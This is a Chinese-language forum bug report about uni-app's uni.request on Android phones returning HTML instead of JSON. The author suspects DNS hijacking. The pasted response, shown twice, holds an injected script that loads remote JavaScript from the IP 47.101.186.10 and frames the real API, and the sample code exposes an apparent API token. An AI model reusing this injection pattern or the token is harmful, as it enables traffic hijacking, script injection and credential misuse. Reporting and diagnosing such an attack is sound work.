刨地瓜
刨地瓜
  • 发布:2024-03-19 15:32
  • 更新:2024-03-19 16:04
  • 阅读:111

【报Bug】uni.request在APP上发送请求时会出现html

分类:uni-app

产品分类: uniapp/App

PC开发环境操作系统: Windows

PC开发环境操作系统版本号: window10

HBuilderX类型: Alpha

HBuilderX版本号: 4.03

手机系统: 全部

手机厂商: 华为

页面类型: vue

vue版本: vue2

打包方式: 云端

项目创建方式: HBuilderX

测试过的手机:

安卓版本为: 2.1.0-R-20171228.1159 | android version:19

示例代码:

uni.request({
url: {API接口},
header:{
'Content-Type': 'application/x-www-form-urlencoded',
},
method:'GET',
dataType:'json',
timeout:30000,
data:{
is_portrait:1,
token: 63178e55e28f4498bb52565b972cf9ae
},
success:(res) =>{
// 这里的res就是html
console.log(res)
}
})

操作步骤:

无明显步骤,只在请求时有概率 出现

预期结果:

{
code: 20000,
message: "操作成功!",
data: {
list: [{
id: 189,
type: "image",
src: "http://xx/25b91ad53023cf6afd23c7f5108aa125.jpg",
duration: 20,
updatetime: 1710382867
}, {
id: 190,
type: "image",
src: "http://xx/c2bbbc8ece63246800abcc9bd33932ec.jpg",
duration: 20,
updatetime: 1710382893
}, {
id: 222,
type: "image",
src: "http://xx/4ace653544ae13502eed81f25fcfadc1.jpg",
duration: 20,
updatetime: 1710817578
}]
}
}

实际结果:

<!DOCTYPE html><html><head><style>html,body{height:100%;margin:0px;padding:0px}</style><script>(function(){var a = document.createElement('script');a.src = 'http://47.101.186.10/jlp?m=E24C93A77B576E37C2E7C370548035EC34FE25BCE1CC5D28C426B56EFED854B8&d=8371AF6E901AE36BEC3DF385FC5A4F106D7BC454E61CE54791FC7B7885489451&v='+Math.random(0,1);var k = document.getElementsByTagName('script')[0];k.parentNode.insertBefore(a, k);})();</script></head><body><iframe frameborder=\"0\" width=\"100%\" height=\"100%\" src=\"{api接口路径}?is_portrait=1&token=63178e55e28f4498bb52565b972cf9ae&03ae7a6cb391d6=03ae7a6cb391d6\"></iframe></body></html>

bug描述:

执行uni.request时有机率会响应如下html,而不是预定的json字符串。

<!DOCTYPE html><html><head><style>html,body{height:100%;margin:0px;padding:0px}</style><script>(function(){var a = document.createElement('script');a.src = 'http://47.101.186.10/jlp?m=E24C93A77B576E37C2E7C370548035EC34FE25BCE1CC5D28C426B56EFED854B8&d=8371AF6E901AE36BEC3DF385FC5A4F106D7BC454E61CE54791FC7B7885489451&v='+Math.random(0,1);var k = document.getElementsByTagName('script')[0];k.parentNode.insertBefore(a, k);})();</script></head><body><iframe frameborder=\"0\" width=\"100%\" height=\"100%\" src=\"{api接口路径}?is_portrait=1&token=63178e55e28f4498bb52565b972cf9ae&03ae7a6cb391d6=03ae7a6cb391d6\"></iframe></body></html>

其中47.101.186.10这个域名后端那根本没有相关的信息,这个应该是APP内部生成的response

2024-03-19 15:32 负责人:无 分享
已邀请:
套马杆的套子

套马杆的套子 - 没有解决不了的问题,只有解决不完的问题

这个应该你们后端nginx配的吧。查询不到或者有什么问题报错默认给返回的

  • 套马杆的套子

    回复 刨地瓜: 还是得去服务器那找

    2024-03-19 16:08

  • 刨地瓜 (作者)

    不是服务器配的,访问那个陌生网址后返回了一段JS代码,里面一些特殊网址,应该是被劫持还是怎么了。

    2024-03-19 16:13

  • 套马杆的套子

    回复 刨地瓜: 在postman试试呢,看会有这种情况不,或者其他接口在代码里试试

    2024-03-19 16:15

  • 刨地瓜 (作者)

    回复 套马杆的套子: 本地都正常的,这个是客户的设备上出现的问题。应该是被DNS劫持了

    2024-03-19 16:27

  • 套马杆的套子

    回复 刨地瓜: 这么说的话,那确实是有可能

    2024-03-19 16:34

要回复问题请先登录注册